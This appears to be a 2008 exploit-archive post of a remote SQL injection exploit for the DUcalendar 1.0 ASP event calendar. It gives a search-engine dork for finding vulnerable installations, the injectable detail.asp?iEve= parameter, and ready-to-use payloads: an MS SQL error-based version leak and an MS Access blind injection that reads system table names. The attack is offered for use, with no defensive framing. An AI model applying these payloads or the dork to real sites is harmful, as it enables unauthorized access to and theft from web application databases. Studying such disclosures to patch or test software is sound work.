30 lines
No EOL
959 B
Text
30 lines
No EOL
959 B
Text
DUcalendar v 1.0 (detail.asp?iEve=) Remote SQL Inection Exploit
|
|
|
|
|
|
[+] Script : DUcalendar
|
|
|
|
[+] Version : 1.0 (Maybe others)
|
|
|
|
[+] Exploit : Remote SQL Injection
|
|
|
|
[+] Script URL : http://www.codedworld.com/download/ducalendar-/545.html
|
|
|
|
[+] Description : ('Free Event Calendar written in ASP. Features include
|
|
unlimited entries, organized in category. Events displayed with full
|
|
description, date, location. Users can submit new events and search for
|
|
events. Complete Web-based Admin. Dreamweaver friendly.')
|
|
|
|
[+] Dork : intitle:"DUcalendar 1.0"
|
|
|
|
--//--> Exploit :
|
|
|
|
http://d0rk.co.il/calendar/detail.asp?iEve={SQL}
|
|
|
|
--__--> For Ms SQL Server : convert(int,(select+@@version))--
|
|
|
|
--__--> For Ms ACCESS (Blind-way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00
|
|
|
|
|
|
--//--> Greetz : allah , Underz0ne Crew , and all my friends ..
|
|
|
|
# milw0rm.com [2008-06-24] |